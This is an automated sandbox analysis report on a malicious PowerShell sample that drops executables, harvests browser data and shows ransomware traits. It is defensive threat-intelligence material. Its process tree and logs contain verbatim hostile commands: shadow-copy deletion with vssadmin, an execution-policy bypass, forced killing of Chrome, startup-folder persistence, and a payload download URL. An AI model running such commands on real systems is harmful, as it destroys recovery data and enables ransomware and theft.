Edit tour

Windows Analysis Report
back.ps1

Overview

General Information

Sample name:	back.ps1
Analysis ID:	1566089
MD5:	a5b77ea033190c4d914caec05d0d3442
SHA1:	a706128c4d0ebb2e1392ebc5bf72e6977802e86b
SHA256:	a8ef13f70701de206e5d946838605d299bb096caa6c149e70af25e938bed576a
Tags:	ps1usjjsjsj-com-nguser-JAMESWT_MHT
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

AI detected suspicious sample

Deletes shadow drive data (may be related to ransomware)

Drops PE files to the document folder of the user

Found pyInstaller with non standard icon

Loading BitLocker PowerShell Module

May disable shadow drive data (uses vssadmin)

Modifies existing user documents (likely ransomware behavior)

Powershell creates an autostart link

Powershell drops PE file

Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE

Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Binary contains a suspicious time stamp

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to detect virtual machines (SLDT)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Startup Folder File Write

Stores files to the Windows start menu directory

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Classification

Process Tree

System is w10x64

powershell.exe (PID: 3136 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\back.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

zed.exe (PID: 2260 cmdline: "C:\Users\user\Documents\gogjothegoat\payload\zed.exe" MD5: FAECB8128727E4D7B36E49B3161A2C9E)

zed.exe (PID: 3196 cmdline: "C:\Users\user\Documents\gogjothegoat\payload\zed.exe" MD5: FAECB8128727E4D7B36E49B3161A2C9E)

powershell.exe (PID: 2064 cmdline: powershell -Command "Disable-ComputerRestore -Drive C:\\" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7120 cmdline: powershell -Command "Enable-ComputerRestore -Drive C:\\" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

vssadmin.exe (PID: 5432 cmdline: vssadmin delete shadows /for=C: /all /quiet MD5: B58073DB8892B67A672906C9358020EC)

conhost.exe (PID: 5332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ChromeComboPack.exe (PID: 1780 cmdline: "C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe" MD5: 8FD73177DC4A6FCC03F8E0307960A488)

conhost.exe (PID: 4236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ChromeComboPack.exe (PID: 6860 cmdline: "C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe" MD5: 8FD73177DC4A6FCC03F8E0307960A488)

taskkill.exe (PID: 6116 cmdline: taskkill /F /IM chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

zed.exe (PID: 1336 cmdline: C:\Users\user\Documents\gogjothegoat\payload\zed.exe MD5: FAECB8128727E4D7B36E49B3161A2C9E)

zed.exe (PID: 7128 cmdline: C:\Users\user\Documents\gogjothegoat\payload\zed.exe MD5: FAECB8128727E4D7B36E49B3161A2C9E)

powershell.exe (PID: 7156 cmdline: powershell -Command "Disable-ComputerRestore -Drive C:\\" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5932 cmdline: powershell -Command "Enable-ComputerRestore -Drive C:\\" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

vssadmin.exe (PID: 5984 cmdline: vssadmin delete shadows /for=C: /all /quiet MD5: B58073DB8892B67A672906C9358020EC)

conhost.exe (PID: 6612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4132 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -File "C:\Users\user\Documents\gogjothegoat\payload\taskboy.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Sigma Signatures

System Summary

Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE

Source: File created

Author: Christopher Peacock '@securepeacock', SCYTHE: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3136, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunTaskboyOnStartup.lnk

Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities

Source: Process started

Author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades): Data: Command: vssadmin delete shadows /for=C: /all /quiet, CommandLine: vssadmin delete shadows /for=C: /all /quiet, CommandLine|base64offset|contains: vh, Image: C:\Windows\System32\vssadmin.exe, NewProcessName: C:\Windows\System32\vssadmin.exe, OriginalFileName: C:\Windows\System32\vssadmin.exe, ParentCommandLine: "C:\Users\user\Documents\gogjothegoat\payload\zed.exe" , ParentImage: C:\Users\user\Documents\gogjothegoat\payload\zed.exe, ParentProcessId: 3196, ParentProcessName: zed.exe, ProcessCommandLine: vssadmin delete shadows /for=C: /all /quiet, ProcessId: 5432, ProcessName: vssadmin.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\back.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\back.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\back.ps1", ProcessId: 3136, ProcessName: powershell.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3136, TargetFilename: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3136, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunTaskboyOnStartup.lnk

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\back.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\back.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\back.ps1", ProcessId: 3136, ProcessName: powershell.exe

Sigma detected: PowerShell Script Dropped Via PowerShell.EXE

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3136, TargetFilename: C:\Users\user\Documents\gogjothegoat\payload\taskboy.ps1

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://usjjsjsj.com.ng/execute/payload.zip

Avira URL Cloud: Label: malware

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 90.3% probability

Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txt
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\wheel-0.43.0.dist-info\LICENSE.txt

Source: unknown

HTTPS traffic detected: 142.132.252.48:443 -> 192.168.2.6:49721 version: TLS 1.2

Source:	Binary string: D:\a\1\b\bin\amd64\python312.pdb source: zed.exe, 0000000C.00000002.4754569858.00007FFD8B3F2000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: zed.exe, 0000000C.00000002.4747871037.00007FFD8A35F000.00000002.00000001.01000000.00000023.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb\| source: zed.exe, 0000000C.00000002.4752771209.00007FFD8AF41000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: cryptography_rust.pdbc source: zed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbDD source: zed.exe, 0000000C.00000002.4762838959.00007FFDA3594000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: ossl_ec_GFp_simple_group_set_curvecrypto\ec\ecp_smpl.cossl_ec_GFp_simple_group_check_discriminantossl_ec_GFp_simple_point_set_affine_coordinatesossl_ec_GFp_simple_point_get_affine_coordinatesossl_ec_GFp_simple_make_affineossl_ec_GFp_simple_points_make_affineossl_ec_GFp_simple_field_invossl_ec_GFp_simple_blind_coordinatescrypto\buffer\buffer.cBUF_MEM_growBUF_MEM_grow_cleancompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specific.dllCPUINFO: crypto\initthread.cOPENSSL_ia32cap` source: zed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: zed.exe, 00000006.00000003.2963522909.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3025129202.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: zed.exe, 00000006.00000003.2957363790.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3009033416.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4773436095.00007FFDA5533000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: zed.exe, 0000000C.00000002.4752771209.00007FFD8AEA9000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: zed.exe, 00000006.00000003.2957363790.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3009033416.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4773436095.00007FFDA5533000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_tkinter.pdb source: zed.exe, 0000000C.00000002.4772130024.00007FFDA46B8000.00000002.00000001.01000000.0000001D.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb source: zed.exe, 0000000C.00000002.4752771209.00007FFD8AF41000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: zed.exe, 00000006.00000003.2963414809.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024889453.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: zed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: zed.exe, 00000006.00000003.2957527840.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3010931232.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4772549604.00007FFDA46D5000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: k1k2k3X9_62_PENTANOMIALp.otherp.onBasisp.tpBasisp.ppBasismX9_62_CHARACTERISTIC_TWOp.primep.char_twofieldTypeX9_62_FIELDIDX9_62_CURVEfieldIDcurvebaseECPARAMETERSvalue.named_curvevalue.parametersvalue.implicitlyCAECPKPARAMETERSprivateKeyparameterspublicKeyEC_PRIVATEKEYec_asn1_group2fieldidcrypto\ec\ec_asn1.cec_asn1_group2curveEC_GROUP_get_ecparametersEC_GROUP_get_ecpkparametersEC_GROUP_new_from_ecparametersEC_GROUP_new_from_ecpkparametersi2d_ECPKParametersd2i_ECPrivateKeyi2d_ECPrivateKeyi2d_ECParametersd2i_ECParameterso2i_ECPublicKeyi2o_ECPublicKeycompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"3.3.2built on: Tue Sep 3 19:22:24 2024 UTCplatform: VC-WIN64AOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availablecrypto\init.cOPENSSL_init_cryptocrypto\bio\bio_lib.cBIO_new_exbio_read_internbio_write_internBIO_sendmmsgBIO_recvmmsgBIO_putsBIO_getsBIO_get_line BIO_ctrlBIO_callback_ctrlBIO_find_type source: zed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: zed.exe, 0000000C.00000002.4773886122.00007FFDA5B83000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: zed.exe, 0000000C.00000002.4767256618.00007FFDA4171000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: zed.exe, 00000006.00000003.2962744638.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3023684524.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4764105632.00007FFDA3617000.00000002.00000001.01000000.00000017.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4764807705.00007FFDA368C000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: zed.exe, 00000006.00000003.2957624149.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3015925774.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: zed.exe, 0000000C.00000002.4764475130.00007FFDA3652000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: zed.exe, 00000006.00000003.2963644992.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3026160093.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4771312925.00007FFDA4633000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4764807705.00007FFDA368C000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: zed.exe, 00000006.00000003.2957771612.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3019498294.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4766514931.00007FFDA3ECE000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.13 30 Jan 20243.0.13built on: Mon Feb 5 17:39:09 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_
Source:	Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: zed.exe, 0000000C.00000002.4772989028.00007FFDA5494000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: zed.exe, 00000006.00000003.2963751700.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4765265995.00007FFDA3A89000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: cryptography_rust.pdb source: zed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_wmi.pdb''&GCTL source: zed.exe, 0000000C.00000002.4772989028.00007FFDA5494000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python3.pdb source: zed.exe, 0000000C.00000002.4733289830.00000132F7DD0000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: zed.exe, 00000006.00000003.2957527840.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3010931232.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4772549604.00007FFDA46D5000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: zed.exe, 0000000C.00000002.4762838959.00007FFDA3594000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: zed.exe, 0000000C.00000002.4763446184.00007FFDA35ED000.00000002.00000001.01000000.00000019.sdmp

Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E5309280 FindFirstFileExW,FindClose,	6_2_00007FF7E5309280
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E5321874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	6_2_00007FF7E5321874
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Code function: 6_2_00007FF7E53083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	6_2_00007FF7E53083C0
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9B7810 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	32_2_00007FF78C9B7810
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9B87E0 FindFirstFileExW,FindClose,	32_2_00007FF78C9B87E0
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Code function: 32_2_00007FF78C9D2A84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	32_2_00007FF78C9D2A84

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: global traffic

HTTP traffic detected: GET /execute/payload.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: usjjsjsj.com.ngConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /execute/payload.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: usjjsjsj.com.ngConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: usjjsjsj.com.ng
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org

Source: zed.exe, 0000000C.00000002.4740017345.00000132F9540000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://.../back.jpeg
